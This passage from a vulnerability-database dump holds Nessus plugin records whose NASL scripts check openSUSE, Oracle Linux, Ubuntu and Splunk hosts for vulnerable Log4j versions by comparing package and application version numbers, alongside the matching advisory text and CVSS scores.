value:\"2021-A-0573\");\n\n script_name(english:\"openSUSE 15 Security Update : kafka (openSUSE-SU-2021:1631-1)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote SUSE host is missing a security update.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote SUSE Linux SUSE15 host has packages installed that are affected by a vulnerability as referenced in the\nopenSUSE-SU-2021:1631-1 advisory.\n\n - JMSAppender in Log4j 1.2 is vulnerable to deserialization of untrusted data when the attacker has write\n access to the Log4j configuration. The attacker can provide TopicBindingName and\n TopicConnectionFactoryBindingName configurations causing JMSAppender to perform JNDI requests that result\n in remote code execution in a similar fashion to CVE-2021-44228. Note this issue only affects Log4j 1.2\n when specifically configured to use JMSAppender, which is not the default. Apache Log4j 1.2 reached end of\n life in August 2015. Users should upgrade to Log4j 2 as it addresses numerous other issues from the\n previous versions. (CVE-2021-4104)\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version\nnumber.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.suse.com/1193662\");\n # https://lists.opensuse.org/archives/list/security-announce@lists.opensuse.org/thread/4BQ3YNECTWF6XMIQDZ7C5QEDQ3QPQT4W/\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?5efa226f\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.suse.com/security/cve/CVE-2021-4104\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update the affected kafka-kit and / or kafka-source packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:S/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:U/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2021-4104\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2021/12/10\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2021/12/28\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2021/12/29\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:kafka-kit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:kafka-source\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:opensuse:15.3\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"SuSE Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2021-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\");\n\n exit(0);\n}\n\n\ninclude('audit.inc');\ninclude('global_settings.inc');\ninclude('misc_func.inc');\ninclude('rpm.inc');\n\nif (!get_kb_item('Host/local_checks_enabled')) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nvar release = get_kb_item('Host/SuSE/release');\nif (isnull(release) || release =~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, 'openSUSE');\nvar os_ver = pregmatch(pattern: \"^SUSE([\\d.]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, 'openSUSE');\nos_ver = os_ver[1];\nif (release !~ \"^(SUSE15\\.3)$\") audit(AUDIT_OS_RELEASE_NOT, 'openSUSE', '15.3', release);\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nvar cpu = get_kb_item('Host/cpu');\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif ('x86_64' >!< cpu && cpu !~ \"^i[3-6]86$\" && 's390' >!< cpu && 'aarch64' >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, 'openSUSE ' + os_ver, cpu);\n\nvar pkgs = [\n {'reference':'kafka-kit-2.1.0-bp153.2.3.1', 'cpu':'x86_64', 'release':'SUSE15.3', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'kafka-source-2.1.0-bp153.2.3.1', 'release':'SUSE15.3', 'rpm_spec_vers_cmp':TRUE}\n];\n\nvar flag = 0;\nforeach package_array ( pkgs ) {\n var reference = NULL;\n var release = NULL;\n var cpu = NULL;\n var rpm_spec_vers_cmp = NULL;\n if (!empty_or_null(package_array['reference'])) reference = package_array['reference'];\n if (!empty_or_null(package_array['release'])) release = package_array['release'];\n if (!empty_or_null(package_array['cpu'])) cpu = package_array['cpu'];\n if (!empty_or_null(package_array['rpm_spec_vers_cmp'])) rpm_spec_vers_cmp = package_array['rpm_spec_vers_cmp'];\n if (reference && release) {\n if (rpm_check(release:release, cpu:cpu, reference:reference, rpm_spec_vers_cmp:rpm_spec_vers_cmp)) flag++;\n }\n}\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_WARNING,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n var tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, 'kafka-kit / kafka-source');\n}\n", "cvss": {"score": 6, "vector": "AV:N/AC:M/Au:S/C:P/I:P/A:P"}}, {"lastseen": "2022-05-18T17:11:36", "description": "The remote Oracle Linux 6 host has packages installed that are affected by a vulnerability as referenced in the ELSA-2022-9056 advisory.\n\n - JMSAppender in Log4j 1.2 is vulnerable to deserialization of untrusted data when the attacker has write access to the Log4j configuration. The attacker can provide TopicBindingName and TopicConnectionFactoryBindingName configurations causing JMSAppender to perform JNDI requests that result in remote code execution in a similar fashion to CVE-2021-44228. Note this issue only affects Log4j 1.2 when specifically configured to use JMSAppender, which is not the default. Apache Log4j 1.2 reached end of life in August 2015. Users should upgrade to Log4j 2 as it addresses numerous other issues from the previous versions. (CVE-2021-4104)\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version number.", "cvss3": {"score": 7.5, "vector": "CVSS:3.0/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H"}, "published": "2022-01-26T00:00:00", "type": "nessus", "title": "Oracle Linux 6 : log4j (ELSA-2022-9056)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2021-4104", "CVE-2021-44228"], "modified": "2022-05-18T00:00:00", "cpe": ["cpe:/o:oracle:linux:6", "p-cpe:/a:oracle:linux:log4j", "p-cpe:/a:oracle:linux:log4j-javadoc", "p-cpe:/a:oracle:linux:log4j-manual"], "id": "ORACLELINUX_ELSA-2022-9056.NASL", "href": "https://www.tenable.com/plugins/nessus/157137", "sourceData": "#%NASL_MIN_LEVEL 70300\n##\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Oracle Linux Security Advisory ELSA-2022-9056.\n##\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(157137);\n script_version(\"1.3\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/05/18\");\n\n script_cve_id(\"CVE-2021-4104\");\n script_xref(name:\"IAVA\", value:\"0001-A-0650\");\n script_xref(name:\"IAVA\", value:\"2021-A-0573\");\n\n script_name(english:\"Oracle Linux 6 : log4j (ELSA-2022-9056)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Oracle Linux host is missing a security update.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Oracle Linux 6 host has packages installed that are affected by a vulnerability as referenced in the\nELSA-2022-9056 advisory.\n\n - JMSAppender in Log4j 1.2 is vulnerable to deserialization of untrusted data when the attacker has write\n access to the Log4j configuration. The attacker can provide TopicBindingName and\n TopicConnectionFactoryBindingName configurations causing JMSAppender to perform JNDI requests that result\n in remote code execution in a similar fashion to CVE-2021-44228. Note this issue only affects Log4j 1.2\n when specifically configured to use JMSAppender, which is not the default. Apache Log4j 1.2 reached end of\n life in August 2015. Users should upgrade to Log4j 2 as it addresses numerous other issues from the\n previous versions. (CVE-2021-4104)\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version\nnumber.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://linux.oracle.com/errata/ELSA-2022-9056.html\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update the affected log4j, log4j-javadoc and / or log4j-manual packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:S/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:U/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2021-4104\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2021/12/14\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2022/01/26\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2022/01/26\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:oracle:linux:6\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:log4j\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:log4j-javadoc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:log4j-manual\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Oracle Linux Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/OracleLinux\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\", \"Host/local_checks_enabled\");\n\n exit(0);\n}\n\n\ninclude('audit.inc');\ninclude('global_settings.inc');\ninclude('rpm.inc');\n\nif (!get_kb_item('Host/local_checks_enabled')) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item('Host/OracleLinux')) audit(AUDIT_OS_NOT, 'Oracle Linux');\nvar release = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || !pregmatch(pattern: \"Oracle (?:Linux Server|Enterprise Linux)\", string:release)) audit(AUDIT_OS_NOT, 'Oracle Linux');\nvar os_ver = pregmatch(pattern: \"Oracle (?:Linux Server|Enterprise Linux) .*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, 'Oracle Linux');\nvar os_ver = os_ver[1];\nif (! preg(pattern:\"^6([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, 'Oracle Linux 6', 'Oracle Linux ' + os_ver);\n\nif (!get_kb_item('Host/RedHat/rpm-list')) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nvar cpu = get_kb_item('Host/cpu');\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif ('x86_64' >!< cpu && cpu !~ \"^i[3-6]86$\" && 'aarch64' >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, 'Oracle Linux', cpu);\n\nvar pkgs = [\n {'reference':'log4j-1.2.14-6.4.1.el6_10', 'cpu':'i686', 'release':'6', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'log4j-1.2.14-6.4.1.el6_10', 'cpu':'x86_64', 'release':'6', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'log4j-javadoc-1.2.14-6.4.1.el6_10', 'cpu':'i686', 'release':'6', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'log4j-javadoc-1.2.14-6.4.1.el6_10', 'cpu':'x86_64', 'release':'6', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'log4j-manual-1.2.14-6.4.1.el6_10', 'cpu':'i686', 'release':'6', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'log4j-manual-1.2.14-6.4.1.el6_10', 'cpu':'x86_64', 'release':'6', 'rpm_spec_vers_cmp':TRUE}\n];\n\nvar flag = 0;\nforeach var package_array ( pkgs ) {\n var reference = NULL;\n var release = NULL;\n var sp = NULL;\n var cpu = NULL;\n var el_string = NULL;\n var rpm_spec_vers_cmp = NULL;\n var epoch = NULL;\n var allowmaj = NULL;\n var exists_check = NULL;\n if (!empty_or_null(package_array['reference'])) reference = package_array['reference'];\n if (!empty_or_null(package_array['release'])) release = 'EL' + package_array['release'];\n if (!empty_or_null(package_array['sp'])) sp = package_array['sp'];\n if (!empty_or_null(package_array['cpu'])) cpu = package_array['cpu'];\n if (!empty_or_null(package_array['el_string'])) el_string = package_array['el_string'];\n if (!empty_or_null(package_array['rpm_spec_vers_cmp'])) rpm_spec_vers_cmp = package_array['rpm_spec_vers_cmp'];\n if (!empty_or_null(package_array['epoch'])) epoch = package_array['epoch'];\n if (!empty_or_null(package_array['allowmaj'])) allowmaj = package_array['allowmaj'];\n if (!empty_or_null(package_array['exists_check'])) exists_check = package_array['exists_check'];\n if (reference && release) {\n if (exists_check) {\n if (rpm_exists(release:release, rpm:exists_check) && rpm_check(release:release, sp:sp, cpu:cpu, reference:reference, epoch:epoch, el_string:el_string, rpm_spec_vers_cmp:rpm_spec_vers_cmp, allowmaj:allowmaj)) flag++;\n } else {\n if (rpm_check(release:release, sp:sp, cpu:cpu, reference:reference, epoch:epoch, el_string:el_string, rpm_spec_vers_cmp:rpm_spec_vers_cmp, allowmaj:allowmaj)) flag++;\n }\n }\n}\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_WARNING,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n var tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, 'log4j / log4j-javadoc / log4j-manual');\n}\n", "cvss": {"score": 6, "vector": "AV:N/AC:M/Au:S/C:P/I:P/A:P"}}, {"lastseen": "2022-05-18T17:08:14", "description": "The remote Ubuntu 18.04 LTS / 20.04 LTS / 21.04 / 21.10 host has a package installed that is affected by a vulnerability as referenced in the USN-5223-1 advisory.\n\n - JMSAppender in Log4j 1.2 is vulnerable to deserialization of untrusted data when the attacker has write access to the Log4j configuration. The attacker can provide TopicBindingName and TopicConnectionFactoryBindingName configurations causing JMSAppender to perform JNDI requests that result in remote code execution in a similar fashion to CVE-2021-44228. Note this issue only affects Log4j 1.2 when specifically configured to use JMSAppender, which is not the default. Apache Log4j 1.2 reached end of life in August 2015. Users should upgrade to Log4j 2 as it addresses numerous other issues from the previous versions. (CVE-2021-4104)\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version number.", "cvss3": {"score": 7.5, "vector": "CVSS:3.0/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H"}, "published": "2022-01-13T00:00:00", "type": "nessus", "title": "Ubuntu 18.04 LTS / 20.04 LTS / 21.04 / 21.10 : Apache Log4j 1.2 vulnerability (USN-5223-1)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2021-4104", "CVE-2021-44228"], "modified": "2022-05-18T00:00:00", "cpe": ["cpe:/o:canonical:ubuntu_linux:18.04:-:lts", "cpe:/o:canonical:ubuntu_linux:20.04:-:lts", "cpe:/o:canonical:ubuntu_linux:21.04", "cpe:/o:canonical:ubuntu_linux:21.10", "p-cpe:/a:canonical:ubuntu_linux:liblog4j1.2-java"], "id": "UBUNTU_USN-5223-1.NASL", "href": "https://www.tenable.com/plugins/nessus/156712", "sourceData": "#%NASL_MIN_LEVEL 70300\n##\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Ubuntu Security Notice USN-5223-1. The text\n# itself is copyright (C) Canonical, Inc. See\n# <https://ubuntu.com/security/notices>. Ubuntu(R) is a registered\n# trademark of Canonical, Inc.\n##\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(156712);\n script_version(\"1.3\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/05/18\");\n\n script_cve_id(\"CVE-2021-4104\");\n script_xref(name:\"USN\", value:\"5223-1\");\n script_xref(name:\"IAVA\", value:\"0001-A-0650\");\n script_xref(name:\"IAVA\", value:\"2021-A-0573\");\n\n script_name(english:\"Ubuntu 18.04 LTS / 20.04 LTS / 21.04 / 21.10 : Apache Log4j 1.2 vulnerability (USN-5223-1)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Ubuntu host is missing a security update.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Ubuntu 18.04 LTS / 20.04 LTS / 21.04 / 21.10 host has a package installed that is affected by a vulnerability\nas referenced in the USN-5223-1 advisory.\n\n - JMSAppender in Log4j 1.2 is vulnerable to deserialization of untrusted data when the attacker has write\n access to the Log4j configuration. The attacker can provide TopicBindingName and\n TopicConnectionFactoryBindingName configurations causing JMSAppender to perform JNDI requests that result\n in remote code execution in a similar fashion to CVE-2021-44228. Note this issue only affects Log4j 1.2\n when specifically configured to use JMSAppender, which is not the default. Apache Log4j 1.2 reached end of\n life in August 2015. Users should upgrade to Log4j 2 as it addresses numerous other issues from the\n previous versions. (CVE-2021-4104)\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version\nnumber.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://ubuntu.com/security/notices/USN-5223-1\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update the affected liblog4j1.2-java package.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:S/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:U/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2021-4104\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2021/12/10\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2022/01/12\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2022/01/13\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:canonical:ubuntu_linux:18.04:-:lts\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:canonical:ubuntu_linux:20.04:-:lts\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:canonical:ubuntu_linux:21.04\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:canonical:ubuntu_linux:21.10\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:liblog4j1.2-java\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Ubuntu Local Security Checks\");\n\n script_copyright(english:\"Ubuntu Security Notice (C) 2022 Canonical, Inc. / NASL script (C) 2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/cpu\", \"Host/Ubuntu\", \"Host/Ubuntu/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\ninclude('audit.inc');\ninclude('ubuntu.inc');\ninclude('misc_func.inc');\n\nif ( ! get_kb_item('Host/local_checks_enabled') ) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nvar release = get_kb_item('Host/Ubuntu/release');\nif ( isnull(release) ) audit(AUDIT_OS_NOT, 'Ubuntu');\nvar release = chomp(release);\nif (! preg(pattern:\"^(18\\.04|20\\.04|21\\.04|21\\.10)$\", string:release)) audit(AUDIT_OS_NOT, 'Ubuntu 18.04 / 20.04 / 21.04 / 21.10', 'Ubuntu ' + release);\nif ( ! get_kb_item('Host/Debian/dpkg-l') ) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nvar cpu = get_kb_item('Host/cpu');\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif ('x86_64' >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, 'Ubuntu', cpu);\n\n\nvar pkgs = [\n {'osver': '18.04', 'pkgname': 'liblog4j1.2-java', 'pkgver': '1.2.17-8+deb10u1ubuntu0.1'},\n {'osver': '20.04', 'pkgname': 'liblog4j1.2-java', 'pkgver': '1.2.17-9ubuntu0.1'},\n {'osver': '21.04', 'pkgname': 'liblog4j1.2-java', 'pkgver': '1.2.17-10ubuntu0.21.04.1'},\n {'osver': '21.10', 'pkgname': 'liblog4j1.2-java', 'pkgver': '1.2.17-10ubuntu0.21.10.1'}\n];\n\nvar flag = 0;\nforeach package_array ( pkgs ) {\n var osver = NULL;\n var pkgname = NULL;\n var pkgver = NULL;\n if (!empty_or_null(package_array['osver'])) osver = package_array['osver'];\n if (!empty_or_null(package_array['pkgname'])) pkgname = package_array['pkgname'];\n if (!empty_or_null(package_array['pkgver'])) pkgver = package_array['pkgver'];\n if (osver && pkgname && pkgver) {\n if (ubuntu_check(osver:osver, pkgname:pkgname, pkgver:pkgver)) flag++;\n }\n}\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_WARNING,\n extra : ubuntu_report_get()\n );\n exit(0);\n}\nelse\n{\n var tested = ubuntu_pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, 'liblog4j1.2-java');\n}\n", "cvss": {"score": 6, "vector": "AV:N/AC:M/Au:S/C:P/I:P/A:P"}}, {"lastseen": "2022-05-04T01:41:17", "description": "According to its self-reported version number, the version of Splunk running on the remote web server is Splunk Enterprise 8.1.x prior to 8.1.7.2 or 8.2.x prior to 8.2.3.3. It may, therefore, be affected by the following vulnerabilities related to the use of Log4j, as follows:\n\n - Apache Log4j2 2.0-beta9 through 2.15.0 (excluding security releases 2.12.2, 2.12.3, and 2.3.1) JNDI features used in configuration, log messages, and parameters do not protect against attacker controlled LDAP and other JNDI related endpoints. An attacker who can control log messages or log message parameters can execute arbitrary code loaded from LDAP servers when message lookup substitution is enabled. From log4j 2.15.0, this behavior has been disabled by default. From version 2.16.0 (along with 2.12.2, 2.12.3, and 2.3.1), this functionality has been completely removed. Note that this vulnerability is specific to log4j-core and does not affect log4net, log4cxx, or other Apache Logging Services projects.\n (CVE-2021-44228)\n\n - It was found that the fix to address CVE-2021-44228 in Apache Log4j 2.15.0 was incomplete in certain non-default configurations. This could allows attackers with control over Thread Context Map (MDC) input data when the logging configuration uses a non-default Pattern Layout with either a Context Lookup (for example, $${ctx:loginId}) or a Thread Context Map pattern (%X, %mdc, or %MDC) to craft malicious input data using a JNDI Lookup pattern resulting in an information leak and remote code execution in some environments and local code execution in all environments. Log4j 2.16.0 (Java 8) and 2.12.2 (Java 7) fix this issue by removing support for message lookup patterns and disabling JNDI functionality by default.\n (CVE-2021-45046)\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version number.", "cvss3": {"score": 10, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H"}, "published": "2022-02-25T00:00:00", "type": "nessus", "title": "Splunk Enterprise 8.1.x < 8.1.7.2 / 8.2.x < 8.2.3.3 Log4j", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2021-44228", "CVE-2021-45046"], "modified": "2022-05-03T00:00:00", "cpe": ["cpe:/a:splunk:splunk"], "id": "SPLUNK_824.NASL", "href": "https://www.tenable.com/plugins/nessus/158383", "sourceData": "#%NASL_MIN_LEVEL 70300\n##\n# (C) Tenable, Inc.\n##\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(158383);\n script_version(\"1.3\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/05/03\");\n\n script_cve_id(\"CVE-2021-44228\", \"CVE-2021-45046\");\n script_xref(name:\"IAVA\", value:\"2022-A-0093\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2021/12/24\");\n\n script_name(english:\"Splunk Enterprise 8.1.x < 8.1.7.2 / 8.2.x < 8.2.3.3 Log4j\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"An application running on a remote web server host may be affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"According to its self-reported version number, the version of Splunk running on the remote web server is Splunk\nEnterprise 8.1.x prior to 8.1.7.2 or 8.2.x prior to 8.2.3.3. It may, therefore, be affected by the following\nvulnerabilities related to the use of Log4j, as follows:\n\n - Apache Log4j2 2.0-beta9 through 2.15.0 (excluding security releases 2.12.2, 2.12.3, and 2.3.1) JNDI\n features used in configuration, log messages, and parameters do not protect against attacker controlled\n LDAP and other JNDI related endpoints. An attacker who can control log messages or log message parameters\n can execute arbitrary code loaded from LDAP servers when message lookup substitution is enabled. From\n log4j 2.15.0, this behavior has been disabled by default. From version 2.16.0 (along with 2.12.2, 2.12.3,\n and 2.3.1), this functionality has been completely removed. Note that this vulnerability is specific to\n log4j-core and does not affect log4net, log4cxx, or other Apache Logging Services projects.\n (CVE-2021-44228)\n\n - It was found that the fix to address CVE-2021-44228 in Apache Log4j 2.15.0 was incomplete in certain\n non-default configurations. This could allows attackers with control over Thread Context Map (MDC) input\n data when the logging configuration uses a non-default Pattern Layout with either a Context Lookup (for\n example, $${ctx:loginId}) or a Thread Context Map pattern (%X, %mdc, or %MDC) to craft malicious input\n data using a JNDI Lookup pattern resulting in an information leak and remote code execution in some\n environments and local code execution in all environments. Log4j 2.16.0 (Java 8) and 2.12.2 (Java 7) fix\n this issue by removing support for message lookup patterns and disabling JNDI functionality by default.\n (CVE-2021-45046)\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version\nnumber.\");\n # https://www.splunk.com/en_us/blog/bulletins/splunk-security-advisory-for-apache-log4j-cve-2021-44228.html\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?56494a5c\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade Splunk Enterprise to version 8.1.7.2, 8.2.3.2, 8.2.4, or later.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2021-44228\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2021/12/10\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2021/12/10\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2022/02/25\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:splunk:splunk\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"CGI abuses\");\n\n script_copyright(english:\"This script is Copyright (C) 2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"splunkd_detect.nasl\", \"splunk_web_detect.nasl\", \"os_fingerprint.nasl\");\n script_require_keys(\"installed_sw/Splunk\");\n script_require_ports(\"Services/www\", 8089, 8000);\n\n exit(0);\n}\n\ninclude('vcf.inc');\ninclude('http.inc');\n\nvar os = get_kb_item('Host/OS');\nif ('windows' >< tolower(os))\n audit(AUDIT_HOST_NOT, 'vulnerable as it is running Windows.');\n\nvar app = 'Splunk';\nvar port = get_http_port(default:8000, embedded:TRUE);\n\nvar app_info = vcf::get_app_info(app:app, port:port);\n\n# Only 8.1 and 8.2 can be vulnerable - audit out definitively if it's not this version before checking for paranoia\nif (app_info['version'] !~ \"^8\\.[12]([^0-9]|$)\")\n audit(AUDIT_LISTEN_NOT_VULN, app, port);\n\nif (app_info['License'] == 'Enterprise')\n{\n var constraints = [\n { 'min_version' : '8.1', 'fixed_version' : '8.1.7.2' },\n { 'min_version' : '8.2', 'fixed_version' : '8.2.3.3', 'fixed_display' : '8.2.3.3 / 8.2.4' }\n ];\n}\n# Other license or no license, report not vulnerable\nelse {\n audit(AUDIT_LISTEN_NOT_VULN, app, port);\n}\n\n# Not checking for the vulnerable DFS configuration, so require paranoia\nif (report_paranoia 